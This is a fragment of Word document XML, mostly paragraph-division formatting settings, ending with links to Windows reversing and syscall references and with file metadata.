      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1094517673">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1096288446">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1111362205">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1124233444">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1208371300">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1214268921">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1237281955">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1262642509">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1276254116">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="992491919">
          <w:blockQuote w:val="1"/>
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="174969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647316">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1300309501">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1306858665">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1315838111">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1376276496">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1377850289">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1428036559">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1441297767">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1465462430">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1470318528">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1490944915">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1706909031">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1708215824">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1758287806">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1786384427">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1852262363">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1932204470">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1956598188">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="838810166">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1337613964">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1361589287">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="240"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1645695402">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1992100458">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2049255519">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2090958504">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2105108283">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2118911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asm.in/blogs/vvedenie-v-reversing-s-nulja-ispolzuja-ida-pro-chast-22.58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skvg.com/how-to-extract-copy-system-files-from-windows-xp-vista-7-or-windows-8-setu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j00ru/windows-syscalls/blob/master/x86/json/win32k-per-syscall.json" TargetMode="Externa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bugs.chromium.org/p/project-zero/issues/detail?id=1078"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B9693A-A9FE-4900-AD6D-D84FAE283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4740</Words>
  <Characters>27018</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>225</Lines>
  <Paragraphs>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2019-09-09T14:55:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-09-23T14:46:00Z</dcterms:modified>
</cp:coreProperties>
</file>